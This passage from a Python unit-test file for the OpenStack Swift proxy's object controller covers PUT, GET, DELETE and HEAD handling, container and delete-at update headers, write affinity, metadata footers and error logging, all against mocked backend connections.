'x-timestamp': next(ts).normal,
} for i in range(request_count)]
responses = [404] * (request_count - 1)
responses.append(200)
request_log = []
def capture_requests(ip, port, device, part, method, path,
headers=None, **kwargs):
req = {
'ip': ip,
'port': port,
'device': device,
'part': part,
'method': method,
'path': path,
'headers': headers,
}
request_log.append(req)
with set_http_connect(*responses,
headers=backend_response_headers,
give_connect=capture_requests):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
for req in request_log:
self.assertEqual(req['method'], 'HEAD')
self.assertEqual(req['path'], '/a/c/o')
def test_container_sync_delete(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
req = swob.Request.blank(
'/v1/a/c/o', method='DELETE', headers={
'X-Timestamp': next(ts).internal})
codes = [409] * self.obj_ring.replicas
ts_iter = itertools.repeat(next(ts).internal)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 409)
def test_PUT_requires_length(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 411)
def test_container_update_backend_requests(self):
for policy in POLICIES:
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT',
headers={'Content-Length': '0',
'X-Backend-Storage-Policy-Index': int(policy)})
controller = self.controller_cls(self.app, 'a', 'c', 'o')
# This is the number of container updates we're doing, simulating
# 1 to 15 container replicas.
for num_containers in range(1, 16):
containers = [{'ip': '1.0.0.%s' % i,
'port': '60%s' % str(i).zfill(2),
'device': 'sdb'} for i in range(num_containers)]
backend_headers = controller._backend_requests(
req, self.replicas(policy), 1, containers)
# how many of the backend headers have a container update
n_container_updates = len(
[headers for headers in backend_headers
if 'X-Container-Partition' in headers])
# how many object-server PUTs can fail and still let the
# client PUT succeed
n_can_fail = self.replicas(policy) - self.quorum(policy)
n_expected_updates = (
n_can_fail + utils.quorum_size(num_containers))
# you get at least one update per container no matter what
n_expected_updates = max(
n_expected_updates, num_containers)
# you can't have more object requests with updates than you
# have object requests (the container stuff gets doubled up,
# but that's not important for purposes of durability)
n_expected_updates = min(
n_expected_updates, self.replicas(policy))
self.assertEqual(n_expected_updates, n_container_updates)
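# Worked example for the arithmetic above (assuming a 3-replica policy with
# quorum 2 and 3 container replicas): n_can_fail = 3 - 2 = 1 and
# quorum_size(3) = 2, so n_expected_updates = min(max(1 + 2, 3), 3) = 3
# object PUTs carry container-update headers.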
def test_delete_at_backend_requests(self):
t = str(int(time.time() + 100))
for policy in POLICIES:
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT',
headers={'Content-Length': '0',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Delete-At': t})
controller = self.controller_cls(self.app, 'a', 'c', 'o')
for num_del_at_nodes in range(1, 16):
containers = [
{'ip': '2.0.0.%s' % i, 'port': '70%s' % str(i).zfill(2),
'device': 'sdc'} for i in range(num_del_at_nodes)]
del_at_nodes = [
{'ip': '1.0.0.%s' % i, 'port': '60%s' % str(i).zfill(2),
'device': 'sdb'} for i in range(num_del_at_nodes)]
backend_headers = controller._backend_requests(
req, self.replicas(policy), 1, containers,
delete_at_container='dac', delete_at_partition=2,
delete_at_nodes=del_at_nodes)
devices = []
hosts = []
part = ctr = 0
for given_headers in backend_headers:
self.assertEqual(given_headers.get('X-Delete-At'), t)
if 'X-Delete-At-Partition' in given_headers:
self.assertEqual(
given_headers.get('X-Delete-At-Partition'), '2')
part += 1
if 'X-Delete-At-Container' in given_headers:
self.assertEqual(
given_headers.get('X-Delete-At-Container'), 'dac')
ctr += 1
devices += (
list_from_csv(given_headers.get('X-Delete-At-Device')))
hosts += (
list_from_csv(given_headers.get('X-Delete-At-Host')))
# same as in test_container_update_backend_requests
n_can_fail = self.replicas(policy) - self.quorum(policy)
n_expected_updates = (
n_can_fail + utils.quorum_size(num_del_at_nodes))
n_expected_hosts = max(
n_expected_updates, num_del_at_nodes)
self.assertEqual(len(hosts), n_expected_hosts)
self.assertEqual(len(devices), n_expected_hosts)
# parts don't get doubled up, maximum is count of obj requests
n_expected_parts = min(
n_expected_hosts, self.replicas(policy))
self.assertEqual(part, n_expected_parts)
self.assertEqual(ctr, n_expected_parts)
# check that hosts are correct
self.assertEqual(
set(hosts),
set('%s:%s' % (h['ip'], h['port']) for h in del_at_nodes))
self.assertEqual(set(devices), set(('sdb',)))
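# Worked example for the counts above (assuming a 3-replica policy with
# quorum 2 and 5 delete-at nodes): n_can_fail = 1 and quorum_size(5) = 3,
# so n_expected_updates = 4, n_expected_hosts = max(4, 5) = 5, while parts
# and containers are capped at min(5, 3) = 3.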
def test_smooth_distributed_backend_requests(self):
t = str(int(time.time() + 100))
for policy in POLICIES:
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT',
headers={'Content-Length': '0',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Delete-At': t})
controller = self.controller_cls(self.app, 'a', 'c', 'o')
for num_containers in range(1, 16):
containers = [
{'ip': '2.0.0.%s' % i, 'port': '70%s' % str(i).zfill(2),
'device': 'sdc'} for i in range(num_containers)]
del_at_nodes = [
{'ip': '1.0.0.%s' % i, 'port': '60%s' % str(i).zfill(2),
'device': 'sdb'} for i in range(num_containers)]
backend_headers = controller._backend_requests(
req, self.replicas(policy), 1, containers,
delete_at_container='dac', delete_at_partition=2,
delete_at_nodes=del_at_nodes)
# calculate the number of expected updates; see
# test_container_update_backend_requests for explanation
n_expected_updates = min(max(
self.replicas(policy) - self.quorum(policy) +
utils.quorum_size(num_containers), num_containers),
self.replicas(policy))
# the first n_expected_updates servers should have received
# a container update
self.assertTrue(
all([h.get('X-Container-Partition')
for h in backend_headers[:n_expected_updates]]))
# the last n_expected_updates servers should have received
# the x-delete-at* headers
self.assertTrue(
all([h.get('X-Delete-At-Container')
for h in backend_headers[-n_expected_updates:]]))
def _check_write_affinity(
self, conf, policy_conf, policy, affinity_regions, affinity_count):
conf['policy_config'] = policy_conf
app = PatchedObjControllerApp(
conf, FakeMemcache(), account_ring=FakeRing(),
container_ring=FakeRing(), logger=self.logger)
controller = self.controller_cls(app, 'a', 'c', 'o')
object_ring = app.get_object_ring(int(policy))
# make our fake ring have plenty of nodes, and not get limited
# artificially by the proxy max request node count
object_ring.max_more_nodes = 100
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
# make sure we have enough local nodes (sanity)
all_local_nodes = [n for n in all_nodes if
n['region'] in affinity_regions]
self.assertGreaterEqual(len(all_local_nodes), affinity_count)
# finally, create the local_first_nodes iter and flatten it out
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1, policy))
# check that the required number of local nodes were moved up the order
node_regions = [node['region'] for node in local_first_nodes]
self.assertTrue(
all(r in affinity_regions for r in node_regions[:affinity_count]),
'Unexpected region found in local nodes, expected %s but got %s' %
(affinity_regions, node_regions))
return app
def test_write_affinity_not_configured(self):
# default is no write affinity so expect both regions 0 and 1
self._check_write_affinity({}, {}, POLICIES[0], [0, 1],
2 * self.replicas(POLICIES[0]))
self._check_write_affinity({}, {}, POLICIES[1], [0, 1],
2 * self.replicas(POLICIES[1]))
def test_write_affinity_proxy_server_config(self):
# without overrides policies use proxy-server config section options
conf = {'write_affinity_node_count': '1 * replicas',
'write_affinity': 'r0'}
self._check_write_affinity(conf, {}, POLICIES[0], [0],
self.replicas(POLICIES[0]))
self._check_write_affinity(conf, {}, POLICIES[1], [0],
self.replicas(POLICIES[1]))
def test_write_affinity_per_policy_config(self):
# check only per-policy configuration is sufficient
conf = {}
policy_conf = {'0': {'write_affinity_node_count': '1 * replicas',
'write_affinity': 'r1'},
'1': {'write_affinity_node_count': '5',
'write_affinity': 'r0'}}
self._check_write_affinity(conf, policy_conf, POLICIES[0], [1],
self.replicas(POLICIES[0]))
self._check_write_affinity(conf, policy_conf, POLICIES[1], [0], 5)
def test_write_affinity_per_policy_config_overrides_and_inherits(self):
# check per-policy config is preferred over proxy-server section config
conf = {'write_affinity_node_count': '1 * replicas',
'write_affinity': 'r0'}
policy_conf = {'0': {'write_affinity': 'r1'},
'1': {'write_affinity_node_count': '3 * replicas'}}
# policy 0 inherits default node count, override affinity to r1
self._check_write_affinity(conf, policy_conf, POLICIES[0], [1],
self.replicas(POLICIES[0]))
# policy 1 inherits default affinity to r0, overrides node count
self._check_write_affinity(conf, policy_conf, POLICIES[1], [0],
3 * self.replicas(POLICIES[1]))
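# For reference, the per-policy overrides exercised above correspond to
# proxy-server.conf sections of this shape (values illustrative):
#
#   [proxy-server:policy:0]
#   write_affinity = r1
#   write_affinity_node_count = 1 * replicas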
# end of BaseObjectControllerMixin
@patch_policies()
class TestReplicatedObjController(BaseObjectControllerMixin,
unittest.TestCase):
controller_cls = obj.ReplicatedObjectController
def test_PUT_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['content-length'] = '0'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_error_with_footers(self):
footers_callback = make_footers_callback('')
env = {'swift.callback.update_footers': footers_callback}
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
environ=env)
req.headers['content-length'] = '0'
codes = [503] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes'
}
with set_http_connect(*codes, expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
def _test_PUT_with_no_footers(self, test_body='', chunked=False):
# verify that when no footers are required then the PUT uses a regular
# single part body
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
body=test_body)
if chunked:
req.headers['Transfer-Encoding'] = 'chunked'
etag = md5(test_body).hexdigest()
req.headers['Etag'] = etag
put_requests = defaultdict(
lambda: {'headers': None, 'chunks': [], 'connection': None})
def capture_body(conn, chunk):
put_requests[conn.connection_id]['chunks'].append(chunk)
put_requests[conn.connection_id]['connection'] = conn
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
conn_id = kwargs['connection_id']
put_requests[conn_id]['headers'] = headers
codes = [201] * self.replicas()
expect_headers = {'X-Obj-Metadata-Footer': 'yes'}
resp_headers = {
'Some-Header': 'Four',
'Etag': '"%s"' % etag,
}
with set_http_connect(*codes, expect_headers=expect_headers,
give_send=capture_body,
give_connect=capture_headers,
headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
timestamps = {captured_req['headers']['x-timestamp']
for captured_req in put_requests.values()}
self.assertEqual(1, len(timestamps), timestamps)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Etag': etag,
'Last-Modified': time.strftime(
"%a, %d %b %Y %H:%M:%S GMT",
time.gmtime(math.ceil(float(timestamps.pop())))),
})
for connection_id, info in put_requests.items():
body = ''.join(info['chunks'])
headers = info['headers']
if chunked:
body = unchunk_body(body)
self.assertEqual('100-continue', headers['Expect'])
self.assertEqual('chunked', headers['Transfer-Encoding'])
else:
self.assertNotIn('Transfer-Encoding', headers)
if body:
self.assertEqual('100-continue', headers['Expect'])
else:
self.assertNotIn('Expect', headers)
self.assertNotIn('X-Backend-Obj-Multipart-Mime-Boundary', headers)
self.assertNotIn('X-Backend-Obj-Metadata-Footer', headers)
self.assertNotIn('X-Backend-Obj-Multiphase-Commit', headers)
self.assertEqual(etag, headers['Etag'])
self.assertEqual(test_body, body)
self.assertTrue(info['connection'].closed)
def test_PUT_with_chunked_body_and_no_footers(self):
self._test_PUT_with_no_footers(test_body='asdf', chunked=True)
def test_PUT_with_body_and_no_footers(self):
self._test_PUT_with_no_footers(test_body='asdf', chunked=False)
def test_PUT_with_no_body_and_no_footers(self):
self._test_PUT_with_no_footers(test_body='', chunked=False)
def _test_PUT_with_footers(self, test_body=''):
# verify that when footers are required the PUT body is multipart
# and the footers are appended
footers_callback = make_footers_callback(test_body)
env = {'swift.callback.update_footers': footers_callback}
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT',
environ=env)
req.body = test_body
# send bogus Etag header to differentiate from footer value
req.headers['Etag'] = 'header_etag'
codes = [201] * self.replicas()
expect_headers = {
'X-Obj-Metadata-Footer': 'yes'
}
put_requests = defaultdict(
lambda: {'headers': None, 'chunks': [], 'connection': None})
def capture_body(conn, chunk):
put_requests[conn.connection_id]['chunks'].append(chunk)
put_requests[conn.connection_id]['connection'] = conn
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
conn_id = kwargs['connection_id']
put_requests[conn_id]['headers'] = headers
resp_headers = {
'Etag': '"resp_etag"',
# NB: ignored!
'Some-Header': 'Four',
}
with set_http_connect(*codes, expect_headers=expect_headers,
give_send=capture_body,
give_connect=capture_headers,
headers=resp_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
timestamps = {captured_req['headers']['x-timestamp']
for captured_req in put_requests.values()}
self.assertEqual(1, len(timestamps), timestamps)
self.assertEqual(dict(resp.headers), {
'Content-Type': 'text/html; charset=UTF-8',
'Content-Length': '0',
'Etag': 'resp_etag',
'Last-Modified': time.strftime(
"%a, %d %b %Y %H:%M:%S GMT",
time.gmtime(math.ceil(float(timestamps.pop())))),
})
for connection_id, info in put_requests.items():
body = unchunk_body(''.join(info['chunks']))
headers = info['headers']
boundary = headers['X-Backend-Obj-Multipart-Mime-Boundary']
self.assertTrue(boundary is not None,
"didn't get boundary for conn %r" % (
connection_id,))
self.assertEqual('chunked', headers['Transfer-Encoding'])
self.assertEqual('100-continue', headers['Expect'])
self.assertEqual('yes', headers['X-Backend-Obj-Metadata-Footer'])
self.assertNotIn('X-Backend-Obj-Multiphase-Commit', headers)
self.assertEqual('header_etag', headers['Etag'])
# email.parser.FeedParser doesn't know how to take a multipart
# message and boundary together and parse it; it only knows how
# to take a string, parse the headers, and figure out the
# boundary on its own.
parser = email.parser.FeedParser()
parser.feed(
"Content-Type: multipart/nobodycares; boundary=%s\r\n\r\n" %
boundary)
parser.feed(body)
message = parser.close()
self.assertTrue(message.is_multipart()) # sanity check
mime_parts = message.get_payload()
# notice, no commit confirmation
self.assertEqual(len(mime_parts), 2)
obj_part, footer_part = mime_parts
self.assertEqual(obj_part['X-Document'], 'object body')
self.assertEqual(test_body, obj_part.get_payload())
# validate footer metadata
self.assertEqual(footer_part['X-Document'], 'object metadata')
footer_metadata = json.loads(footer_part.get_payload())
self.assertTrue(footer_metadata)
expected = {}
footers_callback(expected)
self.assertDictEqual(expected, footer_metadata)
self.assertTrue(info['connection'].closed)
def test_PUT_with_body_and_footers(self):
self._test_PUT_with_footers(test_body='asdf')
def test_PUT_with_no_body_and_footers(self):
self._test_PUT_with_footers()
def test_txn_id_logging_on_PUT(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
self.app.logger.txn_id = req.environ['swift.trans_id'] = 'test-txn-id'
req.headers['content-length'] = '0'
# we capture stdout since the debug log formatter prints the formatted
# message to stdout
stdout = BytesIO()
with set_http_connect((100, Timeout()), 503, 503), \
mock.patch('sys.stdout', stdout):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 503)
for line in stdout.getvalue().splitlines():
self.assertIn('test-txn-id', line)
self.assertIn('Trying to get final status of PUT to',
stdout.getvalue())
def test_PUT_empty_bad_etag(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['Content-Length'] = '0'
req.headers['Etag'] = '"catbus"'
# The 2-tuple here makes getexpect() return 422, not 100. For objects
# that are >0 bytes, you get a 100 Continue and then a 422
# Unprocessable Entity after sending the body. For zero-byte objects,
# though, you get the 422 right away because no Expect header is sent
# with zero-byte PUT. The second status in the tuple should not be
# consumed, it's just there to make the FakeStatus treat the first as
# an expect status, but we'll make it something other than a 422 so
# that if it is consumed then the test should fail.
codes = [FakeStatus((422, 200))
for _junk in range(self.replicas())]
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 422)
def test_PUT_if_none_match(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = '*'
req.headers['content-length'] = '0'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
def test_PUT_if_none_match_denied(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = '*'
req.headers['content-length'] = '0'
with set_http_connect(201, 412, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 412)
def test_PUT_if_none_match_not_star(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
req.headers['if-none-match'] = 'somethingelse'
req.headers['content-length'] = '0'
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
def test_PUT_connect_exceptions(self):
object_ring = self.app.get_object_ring(None)
self.app.sort_nodes = lambda n, *args, **kwargs: n # disable shuffle
def test_status_map(statuses, expected):
self.app._error_limiting = {}
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, expected)
base_status = [201] * 3
# test happy path
test_status_map(list(base_status), 201)
for i in range(3):
self.assertEqual(node_error_count(
self.app, object_ring.devs[i]), 0)
# single node errors and test isolation
for i in range(3):
status_list = list(base_status)
status_list[i] = 503
test_status_map(status_list, 201)
for j in range(3):
self.assertEqual(node_error_count(
self.app, object_ring.devs[j]), 1 if j == i else 0)
# connect errors
test_status_map((201, Timeout(), 201, 201), 201)
self.assertEqual(node_error_count(
self.app, object_ring.devs[1]), 1)
test_status_map((Exception('kaboom!'), 201, 201, 201), 201)
self.assertEqual(node_error_count(
self.app, object_ring.devs[0]), 1)
# expect errors
test_status_map((201, 201, (503, None), 201), 201)
self.assertEqual(node_error_count(
self.app, object_ring.devs[2]), 1)
test_status_map(((507, None), 201, 201, 201), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[0]),
self.app.error_suppression_limit + 1)
# response errors
test_status_map(((100, Timeout()), 201, 201), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[0]), 1)
test_status_map((201, 201, (100, Exception())), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[2]), 1)
test_status_map((201, (100, 507), 201), 201)
self.assertEqual(
node_error_count(self.app, object_ring.devs[1]),
self.app.error_suppression_limit + 1)
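# Hedged miniature (invented names) of the error-limiting bookkeeping
# the assertions above rely on: ordinary failures bump a node's error
# count by one, while 507 Insufficient Storage jumps it straight past
# the suppression limit so the node is avoided immediately.
_demo_suppression_limit = 10
_demo_errors = {}
def _demo_record_error(node, insufficient_storage=False):
    bump = _demo_suppression_limit + 1 if insufficient_storage else 1
    _demo_errors[node] = _demo_errors.get(node, 0) + bump
_demo_record_error('node-0')
_demo_record_error('node-1', insufficient_storage=True)
assert _demo_errors['node-0'] == 1
assert _demo_errors['node-1'] == _demo_suppression_limit + 1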
def test_PUT_connect_exception_with_unicode_path(self):
expected = 201
statuses = (
Exception('Connection refused: Please insert ten dollars'),
201, 201, 201)
req = swob.Request.blank('/v1/AUTH_kilroy/%ED%88%8E/%E9%90%89',
method='PUT',
body='life is utf-gr8')
self.app.logger.clear()
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, expected)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertFalse(log_lines[1:])
self.assertIn('ERROR with Object server', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn('re: Expect: 100-continue', log_lines[0])
def test_PUT_get_expect_errors_with_unicode_path(self):
def do_test(statuses):
req = swob.Request.blank('/v1/AUTH_kilroy/%ED%88%8E/%E9%90%89',
method='PUT',
body='life is utf-gr8')
self.app.logger.clear()
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertFalse(log_lines[1:])
return log_lines
log_lines = do_test((201, (507, None), 201, 201))
self.assertIn('ERROR Insufficient Storage', log_lines[0])
log_lines = do_test((201, (503, None), 201, 201))
self.assertIn('ERROR 503 Expect: 100-continue From Object Server',
log_lines[0])
def test_PUT_send_exception_with_unicode_path(self):
def do_test(exc):
conns = set()
def capture_send(conn, data):
conns.add(conn)
if len(conns) == 2:
raise exc
req = swob.Request.blank('/v1/AUTH_kilroy/%ED%88%8E/%E9%90%89',
method='PUT',
body='life is utf-gr8')
self.app.logger.clear()
with set_http_connect(201, 201, 201, give_send=capture_send):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertFalse(log_lines[1:])
self.assertIn('ERROR with Object server', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn('Trying to write to', log_lines[0])
do_test(Exception('Exception while sending data on connection'))
do_test(ChunkWriteTimeout())
def test_PUT_final_response_errors_with_unicode_path(self):
def do_test(statuses):
req = swob.Request.blank('/v1/AUTH_kilroy/%ED%88%8E/%E9%90%89',
method='PUT',
body='life is utf-gr8')
self.app.logger.clear()
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertFalse(log_lines[1:])
return req, log_lines
req, log_lines = do_test((201, (100, Exception('boom')), 201))
self.assertIn('ERROR with Object server', log_lines[0])
self.assertIn(req.path.decode('utf-8'), log_lines[0])
self.assertIn('Trying to get final status of PUT', log_lines[0])
req, log_lines = do_test((201, (100, Timeout()), 201))
self.assertIn('ERROR with Object server', log_lines[0])
self.assertIn(req.path.decode('utf-8'), log_lines[0])
self.assertIn('Trying to get final status of PUT', log_lines[0])
req, log_lines = do_test((201, (100, 507), 201))
self.assertIn('ERROR Insufficient Storage', log_lines[0])
req, log_lines = do_test((201, (100, 500), 201))
self.assertIn('ERROR 500 From Object Server', log_lines[0])
self.assertIn(req.path.decode('utf-8'), log_lines[0])
def test_DELETE_errors(self):
# verify logged errors with and without non-ascii characters in path
def do_test(path, statuses):
req = swob.Request.blank('/v1' + path,
method='DELETE',
body='life is utf-gr8')
self.app.logger.clear()
with set_http_connect(*statuses):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
log_lines = self.app.logger.get_lines_for_level('error')
self.assertFalse(log_lines[1:])
return req, log_lines
req, log_lines = do_test('/AUTH_kilroy/ascii/ascii',
(201, 500, 201, 201))
self.assertIn('Trying to DELETE', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn(' From Object Server', log_lines[0])
req, log_lines = do_test('/AUTH_kilroy/%ED%88%8E/%E9%90%89',
(201, 500, 201, 201))
self.assertIn('Trying to DELETE', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn(' From Object Server', log_lines[0])
req, log_lines = do_test('/AUTH_kilroy/ascii/ascii',
(201, 507, 201, 201))
self.assertIn('ERROR Insufficient Storage', log_lines[0])
req, log_lines = do_test('/AUTH_kilroy/%ED%88%8E/%E9%90%89',
(201, 507, 201, 201))
self.assertIn('ERROR Insufficient Storage', log_lines[0])
req, log_lines = do_test('/AUTH_kilroy/ascii/ascii',
(201, Exception(), 201, 201))
self.assertIn('Trying to DELETE', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn('ERROR with Object server', log_lines[0])
req, log_lines = do_test('/AUTH_kilroy/%ED%88%8E/%E9%90%89',
(201, Exception(), 201, 201))
self.assertIn('Trying to DELETE', log_lines[0])
self.assertIn(req.swift_entity_path.decode('utf-8'), log_lines[0])
self.assertIn('ERROR with Object server', log_lines[0])
def test_PUT_error_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise IOError('error message')
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 499)
def test_PUT_chunkreadtimeout_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise exceptions.ChunkReadTimeout()
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 408)
def test_PUT_timeout_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise Timeout()
conns = []
def capture_expect(conn):
# stash connections so that we can verify they all get closed
conns.append(conn)
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
with set_http_connect(201, 201, 201, give_expect=capture_expect):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 499)
self.assertEqual(self.replicas(), len(conns))
for conn in conns:
self.assertTrue(conn.closed)
def test_PUT_exception_during_transfer_data(self):
class FakeReader(object):
def read(self, size):
raise Exception('exception message')
req = swob.Request.blank('/v1/a/c/o.jpg', method='PUT',
body='test body')
req.environ['wsgi.input'] = FakeReader()
req.headers['content-length'] = '6'
with set_http_connect(201, 201, 201):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 500)
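# Hedged recap (an illustration, not an API) of the client-read failure
# mapping the four tests above pin down: an IOError or Timeout while
# reading the client body surfaces as 499 (client disconnect), a
# ChunkReadTimeout as 408, and any other exception as 500.
_demo_client_read_failures = {
    'IOError': 499,
    'ChunkReadTimeout': 408,
    'Timeout': 499,
    'any other Exception': 500,
}
assert _demo_client_read_failures['ChunkReadTimeout'] == 408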
def test_GET_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
with set_http_connect(200, headers={'Connection': 'close'}):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertIn('Accept-Ranges', resp.headers)
self.assertNotIn('Connection', resp.headers)
def test_GET_transfer_encoding_chunked(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
with set_http_connect(200, headers={'transfer-encoding': 'chunked'}):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['Transfer-Encoding'], 'chunked')
def _test_removes_swift_bytes(self, method):
req = swift.common.swob.Request.blank('/v1/a/c/o', method=method)
with set_http_connect(
200, headers={'content-type': 'image/jpeg; swift_bytes=99'}):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['Content-Type'], 'image/jpeg')
def test_GET_removes_swift_bytes(self):
self._test_removes_swift_bytes('GET')
def test_HEAD_removes_swift_bytes(self):
self._test_removes_swift_bytes('HEAD')
def test_GET_error(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
self.app.logger.txn_id = req.environ['swift.trans_id'] = 'my-txn-id'
stdout = BytesIO()
with set_http_connect(503, 200), \
mock.patch('sys.stdout', stdout):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
for line in stdout.getvalue().splitlines():
self.assertIn('my-txn-id', line)
self.assertIn('From Object Server', stdout.getvalue())
def test_GET_handoff(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
codes = [503] * self.obj_ring.replicas + [200]
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
def test_GET_not_found(self):
req = swift.common.swob.Request.blank('/v1/a/c/o')
codes = [404] * (self.obj_ring.replicas +
self.obj_ring.max_more_nodes)
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
def test_GET_not_found_when_404_newer(self):
# if the proxy receives a 404, it keeps trying other connections, up
# to the max number of nodes, in hopes of finding the object; but if
# the 404 is more recent than a 200, it should ignore the 200 and
# return 404 (see the timestamp sketch after this test)
req = swift.common.swob.Request.blank('/v1/a/c/o')
codes = [404] * self.obj_ring.replicas + \
[200] * self.obj_ring.max_more_nodes
ts_iter = iter([2] * self.obj_ring.replicas +
[1] * self.obj_ring.max_more_nodes)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
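# Hedged sketch of the rule in the comment above: among the collected
# responses the newest backend timestamp wins, so a newer 404 (e.g. a
# tombstone) beats an older 200. Purely illustrative values.
_demo_responses = [(404, 2), (200, 1)]  # (status, backend timestamp)
_demo_status, _ = max(_demo_responses, key=lambda r: r[1])
assert _demo_status == 404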
def test_GET_x_newest_not_found_when_404_newer(self):
# if the proxy receives a 404, it keeps trying other connections, up
# to the max number of nodes, in hopes of finding the object; but if
# the 404 is more recent than a 200, it should ignore the 200 and
# return 404
req = swift.common.swob.Request.blank('/v1/a/c/o',
headers={'X-Newest': 'true'})
codes = ([200] +
[404] * self.obj_ring.replicas +
[200] * (self.obj_ring.max_more_nodes - 1))
ts_iter = iter([1] +
[2] * self.obj_ring.replicas +
[1] * (self.obj_ring.max_more_nodes - 1))
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
def test_PUT_delete_at(self):
t = str(int(time.time() + 100))
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
put_headers = []
def capture_headers(ip, port, device, part, method, path, headers,
**kwargs):
if method == 'PUT':
put_headers.append(headers)
codes = [201] * self.obj_ring.replicas
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201)
for given_headers in put_headers:
self.assertEqual(given_headers.get('X-Delete-At'), t)
self.assertIn('X-Delete-At-Host', given_headers)
self.assertIn('X-Delete-At-Device', given_headers)
self.assertIn('X-Delete-At-Partition', given_headers)
